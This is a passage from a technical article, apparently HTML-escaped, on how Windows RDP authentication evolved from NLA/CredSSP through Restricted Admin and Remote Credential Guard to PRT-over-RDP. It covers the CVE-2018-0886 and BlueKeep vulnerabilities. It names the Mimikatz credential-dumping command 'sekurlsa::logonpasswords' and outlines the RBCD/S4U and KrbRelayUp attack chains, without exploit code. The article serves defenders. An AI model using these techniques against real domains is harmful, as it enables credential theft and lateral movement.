    C-&amp;gt;&amp;gt;T: TSCredentials (TSPasswordCreds)
    T-&amp;gt;&amp;gt;T: lsass logs user on, NT-OWF cached
    C-&amp;gt;&amp;gt;T: RDP basic-settings exchange + session
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &quot;Enable NLA&quot; in the System Properties dialog flips a server-side policy that requires the connecting client to authenticate via CredSSP before the RDP session is established. NLA is &lt;em&gt;that policy&lt;/em&gt;. CredSSP [@mscssp-index] is the wire protocol that satisfies it. When operators say &quot;we require NLA,&quot; they mean &quot;we accept only &lt;code&gt;requestedProtocols = PROTOCOL_HYBRID&lt;/code&gt; or &lt;code&gt;PROTOCOL_HYBRID_EX&lt;/code&gt;,&quot; which is enforced by Windows refusing the &lt;code&gt;RDP_NEG_REQ&lt;/code&gt; if those bits are not set. The protocol carrying the credential to the target is CredSSP, today and twenty years from now.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What NLA accomplishes is real. The unauthenticated RDP channel-setup code -- basic-settings exchange, virtual-channel binding, the &lt;code&gt;MS_T120&lt;/code&gt; handler that BlueKeep would exploit a decade later -- is no longer reachable from the network. An attacker who reaches TCP/3389 must complete a CredSSP handshake (with valid Kerberos or NTLM credentials) before any RDP-stack code beyond the negotiation header runs. That is a denial-of-service mitigation and a pre-auth-RCE mitigation. It is not a credential-isolation mitigation.&lt;/p&gt;
&lt;p&gt;What NLA does not accomplish is what happens at step 6. The output of CredSSP is &lt;code&gt;TSPasswordCreds&lt;/code&gt;, which is the user&apos;s plaintext password (or its NTLM equivalent in some paths) delivered to the target&apos;s &lt;code&gt;lsass.exe&lt;/code&gt;. Mimikatz &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; against the target after the session ends returns the user&apos;s NT-OWF [@mimikatz-github, @wiki-mimikatz], exactly as it would against a 1998-era classic-RDP target. The 2014 Microsoft &lt;em&gt;Mitigating Pass-the-Hash&lt;/em&gt; whitepaper (version 2) [@msl-pthv2] named this failure mode eight years after NLA shipped: NLA is necessary but not sufficient.&lt;/p&gt;
&lt;p&gt;Mimikatz had given the failure mode a name. Benjamin Delpy released the first version in May 2011, initially closed-source [@wiki-mimikatz]. In September 2011 a version of the exploit was used in the DigiNotar incident [@wiki-mimikatz]. By 2012, on a Windows estate running NLA-mandatory RDP since 2007, attackers were still pivoting from a compromised admin&apos;s workstation to every server that admin had logged into, harvesting NT-OWFs as they went. NLA was on the wire. The Pass-the-Hash playbook still worked.&lt;/p&gt;
&lt;p&gt;NLA moved when the authentication happened. It did not change what the target ended up with. Pass-the-Hash against a 2012-era CredSSP-authenticated RDP target was identical to Pass-the-Hash against a 1998-era classic-RDP target. Microsoft&apos;s architectural response shipped in October 2013 -- and it was a structurally different idea.&lt;/p&gt;
&lt;h2&gt;4. BlueKeep, CVE-2018-0886, and the Two Failure Modes of CredSSP&lt;/h2&gt;
&lt;p&gt;The same NLA that mitigates BlueKeep also introduces CVE-2018-0886. The CVE class is not a coincidence. CredSSP is both the protocol that gates the pre-auth channel-setup code &lt;em&gt;and&lt;/em&gt; the protocol whose own logic now has to be correct. Two CVEs anchor this section, six years apart.&lt;/p&gt;
&lt;h3&gt;CVE-2018-0886: CredSSP Remote Code Execution&lt;/h3&gt;
&lt;p&gt;On March 13, 2018, Microsoft patched a CredSSP logical flaw discovered by Preempt (now CrowdStrike) [@crowdstrike-credssp]. The NVD record states the vulnerability allows &quot;a remote code execution vulnerability due to how CredSSP validates request during the authentication process&quot; [@nvd-2018-0886] and classifies it as CWE-287 (Improper Authentication). The affected matrix is wide: Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 / RT 8.1, Windows Server 2012 and R2, Windows 10 (1507 through 1709), Windows Server 2016, and Windows Server version 1709 [@nvd-2018-0886].&lt;/p&gt;
&lt;p&gt;The mechanism is a man-in-the-middle injection. Preempt&apos;s disclosure timeline (verbatim from the CrowdStrike advisory) is &quot;20/08/2017: Initial disclosure to MSRC; 30/08/2017: MS repro attack and acknowledge issue; 18/09/2017: Microsoft requested an extension on 90 days SLA; 12/03/2018: Microsoft fixes CVE-2018-0886 as part of March patch Tuesday&quot; [@crowdstrike-credssp]. The attack scenarios are real-world: ARP poisoning on a flat LAN, KRACK against a poorly-patched Wi-Fi network, or a vulnerable router on the path between client and target.&lt;/p&gt;

The vulnerability consists of a logical flaw in Credential Security Support Provider protocol (CredSSP), which is used by RDP (Remote Desktop Protocol) and Windows Remote Management (WinRM)... The vulnerability can be exploited by attackers by employing a man-in-the-middle attack. -- CrowdStrike (formerly Preempt) [@crowdstrike-credssp]
&lt;p&gt;The architectural lesson is that CredSSP&apos;s role as a security boundary creates a second security boundary inside the protocol itself. NLA gates the pre-auth code path &lt;em&gt;behind CredSSP&lt;/em&gt;. If CredSSP has a bug, NLA does not protect anything beyond it; the bug &lt;em&gt;is&lt;/em&gt; the pre-auth code path.&lt;/p&gt;
&lt;h3&gt;The AllowEncryptionOracle deployment incident&lt;/h3&gt;
&lt;p&gt;KB4093492 (May 8, 2018) is the worked example of how a protocol-layer compatibility shim becomes a deployment hazard [@msl-kb4093492]. The patch introduced a three-state registry value at &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters\AllowEncryptionOracle&lt;/code&gt;. The states are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Force Updated Clients (0)&lt;/strong&gt; -- the client refuses to communicate with non-patched servers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mitigated (1)&lt;/strong&gt; -- the client accepts patched servers and refuses unpatched servers (default after May 8, 2018).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Vulnerable (2)&lt;/strong&gt; -- the client accepts both, preserving compatibility with unpatched servers (transitional default).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;On May 8, 2018, Microsoft flipped the default from &lt;code&gt;Vulnerable (2)&lt;/code&gt; to &lt;code&gt;Mitigated (1)&lt;/code&gt;. The KB article states bluntly: &quot;By default, after this update is installed, patched clients cannot communicate with unpatched servers&quot; [@msl-kb4093492]. RDP between patched and unpatched estates broke worldwide for a week. The diagnostic Event ID 6041 (&lt;code&gt;LsaSrv&lt;/code&gt;, &quot;Error encountered while reading from the protected payload of the bilateral exchange&quot;) appeared in millions of system logs.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A protocol-layer compatibility shim is itself a deployment surface. The May 2018 default-flip from &lt;code&gt;Vulnerable (2)&lt;/code&gt; to &lt;code&gt;Mitigated (1)&lt;/code&gt; [@msl-kb4093492] was correct as a security posture and disastrous as a rollout sequence. Patch the servers before the clients; verify with &lt;code&gt;Get-ItemProperty &apos;HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters&apos;&lt;/code&gt;; do not assume that &quot;GPO push to clients&quot; is the right first step.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;CVE-2019-0708: BlueKeep&lt;/h3&gt;
&lt;p&gt;On May 14, 2019, Microsoft shipped a fix for a use-after-free in the &lt;code&gt;MS_T120&lt;/code&gt; virtual-channel binding handler inside &lt;code&gt;termdd.sys&lt;/code&gt; -- the kernel-mode driver that handles RDP transport-layer code [@wiki-bluekeep]. The vulnerability, named BlueKeep by Kevin Beaumont on Twitter and discovered by the UK National Cyber Security Centre [@wiki-bluekeep], allowed pre-authentication remote code execution at &lt;code&gt;SYSTEM&lt;/code&gt; on the target. The NVD record (CVE-2019-0708) lists references to PacketStorm exploits, Siemens advisories, the MSRC vendor advisory, and the CISA Known Exploited Vulnerabilities catalog [@nvd-2019-0708].&lt;/p&gt;
&lt;p&gt;The affected matrix is &quot;Windows XP, Windows Vista, Windows 7, Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2&quot; [@wiki-bluekeep]. Microsoft issued out-of-band patches for the end-of-life operating systems (Windows XP and Server 2003) [@wiki-bluekeep] -- a step the company reserves for vulnerabilities expected to be weaponised at scale. CISA, the NSA, and Microsoft all issued emergency advisories.&lt;/p&gt;

The common shorthand for BlueKeep is that it was &quot;a vulnerability in pre-NLA RDP.&quot; The shorthand is wrong, and the precision matters because it sets up the wrong intuition for every authentication mode that follows.&lt;p&gt;NLA existed natively in every BlueKeep-affected operating system from Windows Vista onward -- Windows 7, Server 2008, and Server 2008 R2 all shipped NLA support, and many of those estates ran with NLA on. Windows XP and Server 2003 did not ship NLA natively; CredSSP / NLA was retrofitted to both via KB951608 (March 2009) [@wiki-bluekeep]. BlueKeep is a vulnerability in the channel-setup code reachable when NLA is &lt;em&gt;not enforced&lt;/em&gt; -- the channel-setup code being the &lt;code&gt;MS_T120&lt;/code&gt; virtual-channel binder in &lt;code&gt;termdd.sys&lt;/code&gt;, which is reachable only after the negotiation header but before the basic-settings exchange when CredSSP is not gating the path [@wiki-bluekeep].&lt;/p&gt;
&lt;p&gt;When &lt;code&gt;requestedProtocols = PROTOCOL_RDP (0x00)&lt;/code&gt; and the server permits it, the client skips the CredSSP gate and walks straight into the basic-settings exchange. The &lt;code&gt;MS_T120&lt;/code&gt; channel binding happens in that pre-authentication window. NLA closes that window by requiring &lt;code&gt;PROTOCOL_HYBRID (0x02)&lt;/code&gt; (or &lt;code&gt;_HYBRID_EX 0x08&lt;/code&gt;) before any RDP-stack code beyond the negotiation header runs. The mitigation guidance every operator received in May 2019 -- &quot;enable NLA&quot; -- worked because of this layering, not because BlueKeep was a vulnerability in a pre-NLA era.&lt;/p&gt;
&lt;p&gt;The framing matters because the same precision applies to every later mode. Restricted Admin, Remote Credential Guard, and PRT-over-RDP all sit on top of CredSSP gating (or, for PRT-over-RDP, on top of a different gate entirely). None of them protect anything in the channel-setup phase. NLA does.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The BlueKeep out-of-band patch for Windows XP and Server 2003 [@wiki-bluekeep] is one of the rare exceptions to Microsoft&apos;s end-of-life policy. The 2017 WannaCry / EternalBlue cycle made Microsoft cautious about wormable pre-auth RCE on end-of-life operating systems; BlueKeep met the same threshold. The pattern -- a pre-auth RCE in long-deployed Windows networking code, with end-of-life patches issued out-of-band -- recurs about once every five years.&lt;/p&gt;
&lt;p&gt;NLA mitigates BlueKeep but does not stop Pass-the-Hash. CredSSP itself has a non-trivial logical-attack surface. The architectural response to the Pass-the-Hash failure had already shipped five years before BlueKeep -- and it took the opposite approach. Instead of delivering the credential more securely, it stopped delivering the credential at all.&lt;/p&gt;
&lt;h2&gt;5. Restricted Admin: User Is the Machine (2013)&lt;/h2&gt;
&lt;p&gt;On October 17, 2013, Microsoft shipped a feature whose entire architectural insight fits in one sentence: stop delivering the user&apos;s credential to the target, and let the target log the user on as the target itself.&lt;/p&gt;
&lt;p&gt;The feature is Restricted Admin mode, part of the CredSSP protocol family. It first shipped with Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1 at RTM. Microsoft Security Advisory 2871997 states this verbatim: &quot;Supported editions of Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1 already include these features and do not need the 2871997 update&quot; [@ms-adv-2871997]. The advisory is the load-bearing primary that pins the October 2013 ship date, because the advisory itself was the &lt;em&gt;backport&lt;/em&gt; notice for older operating systems.&lt;/p&gt;

The shorthand &quot;Restricted Admin shipped with KB2871997 in 2014&quot; is a recurring misreading worth defusing. Restricted Admin shipped on three separate dates:&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;October 17, 2013&lt;/strong&gt; -- Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1 RTM. Restricted Admin is in the box. No update required [@ms-adv-2871997].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;May 13, 2014&lt;/strong&gt; -- KB2871997 backported the &lt;em&gt;CredSSP-layer&lt;/em&gt; support to Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, and Windows RT [@ms-adv-2871997]. The advisory text reads verbatim: &quot;On May 13, 2014, Microsoft released the 2871997 update for supported editions of Windows 8, Windows RT, Windows Server 2012, Windows 7, and Windows Server 2008 R2 that improves credential protection and domain authentication controls to reduce credential theft. This update provides additional protection for the Local Security Authority (LSA), adds a restricted admin mode for Credential Security Support Provider (CredSSP)...&quot; [@ms-adv-2871997].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;October 14, 2014&lt;/strong&gt; -- the &lt;em&gt;RDP-client-side&lt;/em&gt; backport in KB2984972 (Win 7 / Server 2008 R2), KB2984976 (Win 7), KB2984981 (Win 7), and KB2973501 (Server 2012). Without the client-side update, Win 7 clients could not &lt;em&gt;initiate&lt;/em&gt; a Restricted Admin RDP connection even though their CredSSP layer supported the protocol after May 2014 [@ms-adv-2871997].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If you read &quot;2014 KB2871997&quot; as the introduction date, the feature looks like a Windows-7-and-back retrofit. It is the opposite: Restricted Admin was a Windows 8.1 RTM feature whose value to the existing fleet was unlocked by two later backports.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;The wire protocol&lt;/h3&gt;
&lt;p&gt;Restricted Admin opt-in lives in two bytes on the wire, both documented verbatim in MS-RDPBCGR. The client sets &lt;code&gt;RDP_NEG_REQ.flags &amp;amp; RESTRICTED_ADMIN_MODE_REQUIRED = 0x01&lt;/code&gt; to signal the request: &quot;Indicates that the client requires credential-less logon over CredSSP (also known as &apos;restricted admin mode&apos;). If the server supports this mode then it is acceptable for the client to send empty credentials in the &lt;strong&gt;TSPasswordCreds&lt;/strong&gt; structure&quot; [@rdpbcgr-negreq]. The server confirms support by setting &lt;code&gt;RDP_NEG_RSP.flags &amp;amp; RESTRICTED_ADMIN_MODE_SUPPORTED = 0x08&lt;/code&gt; in the response: &quot;Indicates that the server supports credential-less logon over CredSSP&quot; [@rdpbcgr-negrsp].&lt;/p&gt;
&lt;p&gt;The CredSSP exchange itself runs end-to-end. TLS handshake completes; SPNEGO selects Kerberos or NTLM; the user authenticates. At step 6 -- where classic CredSSP would send a populated &lt;code&gt;TSPasswordCreds&lt;/code&gt; -- the client sends an &lt;em&gt;empty&lt;/em&gt; &lt;code&gt;TSPasswordCreds&lt;/code&gt;. No password, no NT-OWF, no forwarded TGT. The target receives no credential material.&lt;/p&gt;

A CredSSP sub-mode signalled by the `RDP_NEG_REQ.flags &amp;amp; RESTRICTED_ADMIN_MODE_REQUIRED 0x01` bit [@rdpbcgr-negreq]. The client completes authentication to the target but sends an empty `TSPasswordCreds` payload; the target then logs the user on using the target&apos;s own machine account, restricting the session to actions the local Administrators group can perform. Introduced at Windows 8.1 / Server 2012 R2 RTM (October 17, 2013) [@ms-adv-2871997]; backported to Windows 7 / Server 2008 R2 via KB2871997 (May 13, 2014) and the October 14, 2014 client-side KBs.
&lt;h3&gt;The mechanism: the user becomes the machine&lt;/h3&gt;
&lt;p&gt;When the target sees an empty &lt;code&gt;TSPasswordCreds&lt;/code&gt; and the &lt;code&gt;RESTRICTED_ADMIN_MODE_REQUIRED&lt;/code&gt; flag, it does not refuse the logon. It logs the user on by impersonating the target&apos;s own machine account (&lt;code&gt;&amp;lt;TARGETNAME&amp;gt;$&lt;/code&gt;). The machine account is in the local Administrators group by default; the user requesting the session must already be a member of the same group on the target. Microsoft Learn states the access prerequisite for Restricted Admin as &quot;Membership of &lt;strong&gt;Administrators&lt;/strong&gt; group on remote host&quot; [@msl-rcg].&lt;/p&gt;

sequenceDiagram
    autonumber
    participant C as Client
    participant T as Target
    participant K as KDC
    C-&amp;gt;&amp;gt;T: RDP_NEG_REQ (PROTOCOL_HYBRID 0x02 + flags 0x01)
    T--&amp;gt;&amp;gt;C: RDP_NEG_RSP (flags 0x08 supported)
    C-&amp;gt;&amp;gt;T: TLS handshake
    C-&amp;gt;&amp;gt;K: Kerberos AS / TGS for target SPN
    C-&amp;gt;&amp;gt;T: AP-REQ inside SPNEGO (user authenticated)
    C-&amp;gt;&amp;gt;T: TSPasswordCreds (EMPTY)
    T-&amp;gt;&amp;gt;T: LogonUser as TARGET$ machine account
    T-&amp;gt;&amp;gt;T: Token in local Administrators
    C-&amp;gt;&amp;gt;T: RDP session as machine identity
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The breakthrough in Restricted Admin is not a new crypto primitive. It is the realisation that the target can act on the user&apos;s behalf by impersonating &lt;em&gt;itself&lt;/em&gt; -- the target&apos;s own machine account -- which is already a local Administrator. The session has access to local resources, the user has full administrative use of the target, and the target&apos;s &lt;code&gt;lsass.exe&lt;/code&gt; holds no user credential material. The trade is the user&apos;s downstream identity: the session cannot use the user&apos;s credentials for SSO, because the session is not the user. The session is the target.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The trade-offs, verbatim from Microsoft Learn&lt;/h3&gt;
&lt;p&gt;Microsoft Learn publishes a comparison matrix that lays out the trade-offs across Remote Desktop (classic), Remote Credential Guard, and Restricted Admin [@msl-rcg]. For Restricted Admin, the row entries are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Prevent use of user&apos;s identity during connection: yes.&lt;/li&gt;
&lt;li&gt;Prevent use of credentials after disconnection: yes.&lt;/li&gt;
&lt;li&gt;Prevent Pass-the-Hash: yes.&lt;/li&gt;
&lt;li&gt;Single sign-on to other systems: no.&lt;/li&gt;
&lt;li&gt;Multi-hop RDP: no.&lt;/li&gt;
&lt;li&gt;Supported authentication: any negotiated by CredSSP (Kerberos or NTLM).&lt;/li&gt;
&lt;li&gt;Credentials supported from the client: signed-in credentials, supplied creds, saved creds.&lt;/li&gt;
&lt;li&gt;RDP access granted with: membership of Administrators on the remote host [@msl-rcg].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is the architectural trade. The user is gone the moment the session ends. The attacker who compromises the target during the session gets local Administrator -- but via the machine identity, not via the user&apos;s credential.&lt;/p&gt;
&lt;h3&gt;The RBCD residual class&lt;/h3&gt;
&lt;p&gt;There is no free lunch. Restricted Admin&apos;s &quot;user becomes the machine identity&quot; design creates a different residual surface. If the attacker can write the &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; attribute on the target&apos;s computer object in Active Directory, the attacker can use Resource-Based Constrained Delegation to S4U2self + S4U2proxy a Kerberos service ticket for &lt;code&gt;TERMSRV/&amp;lt;target&amp;gt;&lt;/code&gt; and RDP in as &lt;em&gt;anyone&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Elad Shamir documented this in his January 28, 2019 essay &quot;Wagging the Dog&quot; [@shamir-wagging]. The TL;DR points are precise: &quot;Resource-based constrained delegation does not require a forwardable TGS when invoking S4U2Proxy. S4U2Self works on any account that has an SPN, regardless of the state of the &lt;code&gt;TrustedToAuthForDelegation&lt;/code&gt; attribute... if an attacker can control a computer object in Active Directory, then it may be possible to abuse it to compromise the host. S4U2Proxy always produces a forwardable TGS, even if the provided additional TGS in the request was not forwardable&quot; [@shamir-wagging].&lt;/p&gt;

A Kerberos delegation model introduced in Windows Server 2012 where the *target* resource controls which principals can delegate to it via the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute on its own computer object. Combined with S4U2self and S4U2proxy, RBCD lets any principal that can write that attribute on a target&apos;s computer object obtain a forwardable Kerberos service ticket for any service on the target, including `TERMSRV` (the RDP service principal) [@shamir-wagging]. See the companion *NTLMless* article on this site for the wider S4U and Kerberos-relay discussion.

Computer accounts just got a lot more interesting. Start hunting for more primitives to trigger attack chains! -- Elad Shamir, *Wagging the Dog* (2019) [@shamir-wagging]
&lt;p&gt;Dec0ne&apos;s KrbRelayUp (2022) productionised the chain as &quot;essentially a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)&quot; [@krbrelayup]. The tool wraps Rubeus, KrbRelay, and ADCSPwn for a kerberos-relay-to-RBCD-to-ShadowCred-to-S4U2self-to-SCMUACBypass chain that ends in &lt;code&gt;SYSTEM&lt;/code&gt; on the target. Restricted Admin&apos;s machine-identity-as-session design is exactly what this chain rewards: the attacker walks away with Administrator on the target via the machine identity, with no need to harvest the user&apos;s credential.&lt;/p&gt;
&lt;p&gt;Restricted Admin solves the credential-aggregation problem for jump servers. It does so by eliminating SSO and requiring local Administrator on the target -- which means it cannot be the answer for regular user RDP. If the target needs to act as the user during the session but never holds the user&apos;s credentials, the only place those credentials can live is back on the caller. That insight took three more years to ship.&lt;/p&gt;
&lt;h2&gt;6. Remote Credential Guard: Challenges Redirect to Caller (2016)&lt;/h2&gt;
&lt;p&gt;Remote Credential Guard is what you get if you take Restricted Admin&apos;s &quot;no credential material delivered to the target&quot; rule and add &quot;but the target still needs to act as the user during the session.&quot; Both halves are achievable. The cost is one extra RPC round-trip for every Kerberos operation the session performs -- and a hard dependency on Kerberos itself.&lt;/p&gt;
&lt;p&gt;On August 2, 2016, Microsoft shipped Windows 10 1607 (the Anniversary Update) and Windows Server 2016 with Remote Credential Guard [@msl-rcg]. The Microsoft Learn page states the design property in one sentence: &quot;Remote Credential Guard helps protecting credentials over a Remote Desktop (RDP) connection by redirecting Kerberos requests back to the device that&apos;s requesting the connection. If the target device is compromised, the credentials aren&apos;t exposed because both credential and credential derivatives are never passed over the network to the target device&quot; [@msl-rcg].&lt;/p&gt;
&lt;h3&gt;The wire protocol&lt;/h3&gt;
&lt;p&gt;Opt-in lives in two more flag bits on the CredSSP negotiation. The client sets &lt;code&gt;RDP_NEG_REQ.flags &amp;amp; REDIRECTED_AUTHENTICATION_MODE_REQUIRED = 0x02&lt;/code&gt; to signal the request: the flag indicates &quot;the client can send a redirected logon buffer in the TSRemoteGuardCreds structure&quot; [@rdpbcgr-negreq]. The server confirms by setting &lt;code&gt;RDP_NEG_RSP.flags &amp;amp; REDIRECTED_AUTHENTICATION_MODE_SUPPORTED = 0x10&lt;/code&gt;: &quot;Indicates that the server supports credential-less logon over CredSSP with credential redirection (also known as &apos;Remote Credential Guard&apos;)&quot; [@rdpbcgr-negrsp].&lt;/p&gt;
&lt;p&gt;The credential payload changes. Instead of an empty &lt;code&gt;TSPasswordCreds&lt;/code&gt; (Restricted Admin) or a populated one (classic CredSSP), the client sends a &lt;code&gt;TSRemoteGuardCreds&lt;/code&gt;. The ASN.1 structure is documented verbatim in MS-CSSP [@mscssp-trgcreds]:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TSRemoteGuardCreds ::= SEQUENCE {
    logonCred         [0] TSRemoteGuardPackageCred,
    supplementalCreds [1] SEQUENCE OF TSRemoteGuardPackageCred OPTIONAL
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The payload does not carry a password or a hash. It carries a &lt;em&gt;handle&lt;/em&gt; that lets the target forward authentication challenges back to the caller. MS-CSSP states that &quot;The logon credential is passed to the Negotiate package, which in turn passes the credential to the default authentication package&quot; [@mscssp-trgcreds] -- the negotiate package on the &lt;em&gt;target&lt;/em&gt; receives a redirect-handle, not a credential.&lt;/p&gt;

A CredSSP sub-mode signalled by the `RDP_NEG_REQ.flags &amp;amp; REDIRECTED_AUTHENTICATION_MODE_REQUIRED 0x02` bit [@rdpbcgr-negreq]. The session preserves the user&apos;s identity (unlike Restricted Admin), but every downstream Kerberos operation is performed by the caller&apos;s `lsass.exe` on behalf of the session, forwarded via RPC. Kerberos-only -- no NTLM fallback. Introduced in Windows 10 1607 and Windows Server 2016 (August 2, 2016) [@msl-rcg].

The CredSSP payload used by Remote Credential Guard [@mscssp-trgcreds]. A `SEQUENCE` of a `logonCred` and zero or more `supplementalCreds`, each of type `TSRemoteGuardPackageCred`. The handle is opaque to the target&apos;s authentication package; the target uses it only to request operations from the caller.
&lt;h3&gt;The runtime mechanism&lt;/h3&gt;
&lt;p&gt;The interesting half of Remote CG runs &lt;em&gt;after&lt;/em&gt; the session establishes. Suppose the user, now logged into the target as themselves, opens a file from a network share, mounts a database connection, or starts a second RDP hop. Each of those actions needs a Kerberos service ticket. The session host does not call &lt;code&gt;KerbCreateTicket()&lt;/code&gt; itself. It packages an RPC request and sends it back to the caller&apos;s machine, where the caller&apos;s &lt;code&gt;lsass.exe&lt;/code&gt; performs the operation using the caller&apos;s TGT and session key, then returns the resulting service ticket to the target session.&lt;/p&gt;

sequenceDiagram
    autonumber
    participant C as Client + caller lsass
    participant T as Target session host
    participant K as KDC
    participant F as File server (TGS target)
    C-&amp;gt;&amp;gt;T: RDP_NEG_REQ (flags 0x02)
    T--&amp;gt;&amp;gt;C: RDP_NEG_RSP (flags 0x10)
    C-&amp;gt;&amp;gt;T: TLS handshake
    C-&amp;gt;&amp;gt;T: TSRemoteGuardCreds (handle)
    T-&amp;gt;&amp;gt;T: Session start as user identity
    T-&amp;gt;&amp;gt;C: RPC: TGS-REQ for cifs/fileserver
    C-&amp;gt;&amp;gt;K: TGS-REQ
    K--&amp;gt;&amp;gt;C: TGS-REP
    C--&amp;gt;&amp;gt;T: TGS-REP forwarded back
    T-&amp;gt;&amp;gt;F: AP-REQ with forwarded TGS
    F--&amp;gt;&amp;gt;T: AP-REP, SMB session
&lt;p&gt;The cost is a round-trip per Kerberos operation. Over a LAN that is a few milliseconds; over a WAN that can be 50 milliseconds or more.About 5ms LAN, 50ms WAN, per operation.Remote CG is the only RDP authentication mode with runtime overhead proportional to downstream Kerberos hops. Classic CredSSP, Restricted Admin, and PRT-over-RDP all complete their credential exchange before the session starts; the session then talks to downstream services using credentials that already live on the target. Remote CG keeps the credentials at home and pays an RPC round-trip every time the session needs one. On a chatty workload -- mounting multiple SMB shares, opening many database connections, or chaining RDP hops -- this overhead is observable.&lt;/p&gt;
&lt;h3&gt;The trustlet conditional&lt;/h3&gt;
&lt;p&gt;A common belief about Remote Credential Guard is that it stores the redirected-authentication signing material in the caller&apos;s VBS trustlet &lt;code&gt;LsaIso.exe&lt;/code&gt;. That is &lt;em&gt;partly&lt;/em&gt; true and worth getting precise.&lt;/p&gt;
&lt;p&gt;Remote Credential Guard always redirects challenges to the caller&apos;s &lt;code&gt;lsass.exe&lt;/code&gt;. Where the long-lived signing material lives on the caller is a separate question:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If the caller has local Credential Guard enabled, the secrets that back the redirected operations live in the caller&apos;s VTL1 &lt;code&gt;LsaIso.exe&lt;/code&gt; trustlet, isolated from VTL0 user-mode code on the caller.&lt;/li&gt;
&lt;li&gt;If the caller does &lt;em&gt;not&lt;/em&gt; have local Credential Guard, the same material lives in regular user-mode &lt;code&gt;lsass.exe&lt;/code&gt; on the caller, with no VTL1 isolation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The protocol still works in both cases. The redirection still happens. What changes is the protection the caller&apos;s lsass gets from an attacker who later compromises the caller. See the companion &lt;em&gt;Credential Guard&lt;/em&gt; article on this site for the LsaIso internals.&lt;/p&gt;

The &quot;isolated LSA&quot; trustlet that runs in VTL1 under Virtualization-Based Security when Credential Guard is enabled. Stores credential-derived secrets (NTLM hash, Kerberos session key, TGT key, certificate private keys) outside the reach of VTL0 code, including kernel-mode rootkits. Documented in detail in the companion *Credential Guard* article on this site.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Remote Credential Guard always protects the credential from the &lt;em&gt;target&lt;/em&gt; -- the target never sees it, regardless of caller configuration. Remote Credential Guard protects the credential from a &lt;em&gt;post-compromise of the caller&lt;/em&gt; only if the caller has local Credential Guard enabled. The shorthand &quot;Remote CG runs in a VBS trustlet&quot; is true only for the second protection; for the first, the protection lives in the protocol, not in VBS.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Kerberos-only -- and what that means for NTLM-mixed estates&lt;/h3&gt;
&lt;p&gt;Remote CG depends on Kerberos. Microsoft Learn is explicit: &quot;Must use Kerberos authentication to connect to the remote host. If the client can&apos;t connect to a domain controller, then RDP attempts to fall back to NTLM. Remote Credential Guard doesn&apos;t allow NTLM fallback because it would expose credentials to risk&quot; [@msl-rcg].&lt;/p&gt;
&lt;p&gt;The reason is structural. NTLM challenge-response sends a chosen-plaintext-style hash of the user&apos;s NT-OWF to the target. Remote CG&apos;s redirection scheme works for Kerberos because the target can ask the caller to mint a service ticket; there is no equivalent operation in NTLM. Remote CG has nothing to redirect that does not eventually require the caller to hand over usable hash material.&lt;/p&gt;
&lt;p&gt;Operationally, this means a 2026 estate that has not finished NTLM deprecation work cannot universally deploy Remote CG. Any RDP path that would fall back to NTLM -- a workgroup machine, a target whose Kerberos SPN registration is broken, a destination behind a DC-isolating firewall rule -- refuses to negotiate Remote CG and either fails the session or falls back to Restricted Admin (depending on the &lt;code&gt;RestrictedRemoteAdministration&lt;/code&gt; GPO setting). See the companion &lt;em&gt;NTLMless&lt;/em&gt; article on this site for the wider context.The UWP Remote Desktop client (the modern Microsoft Store variant) does not support Remote Credential Guard [@msl-rcg]. Only the classic &lt;code&gt;mstsc.exe&lt;/code&gt; Win32 client implements the negotiation. Operators planning to enforce Remote CG must inventory which client binaries connect to which targets; mixing UWP clients into a Remote-CG-mandatory target pool produces silent connection failures.&lt;/p&gt;
&lt;p&gt;Remote CG closes credential-after-disconnection and Pass-the-Hash without sacrificing SSO. It does so by demanding Kerberos and one extra RPC per downstream hop. But the model assumes the user has on-prem-AD-routable Kerberos credentials -- which a Microsoft-Entra-joined laptop without hybrid join does not. The next generation throws away Kerberos entirely.&lt;/p&gt;
&lt;h2&gt;7. PRT-over-RDP: No Password, No Hash, No Ticket (2022)&lt;/h2&gt;
&lt;p&gt;On October 11, 2022, Microsoft shipped the first RDP authentication mode that has no &lt;code&gt;lsass.exe&lt;/code&gt;-credential-delivery story to tell -- because there is no NTLM hash, no Kerberos ticket, and no password in the entire exchange. The credential is a JSON Web Token issued by Microsoft Entra ID.&lt;/p&gt;
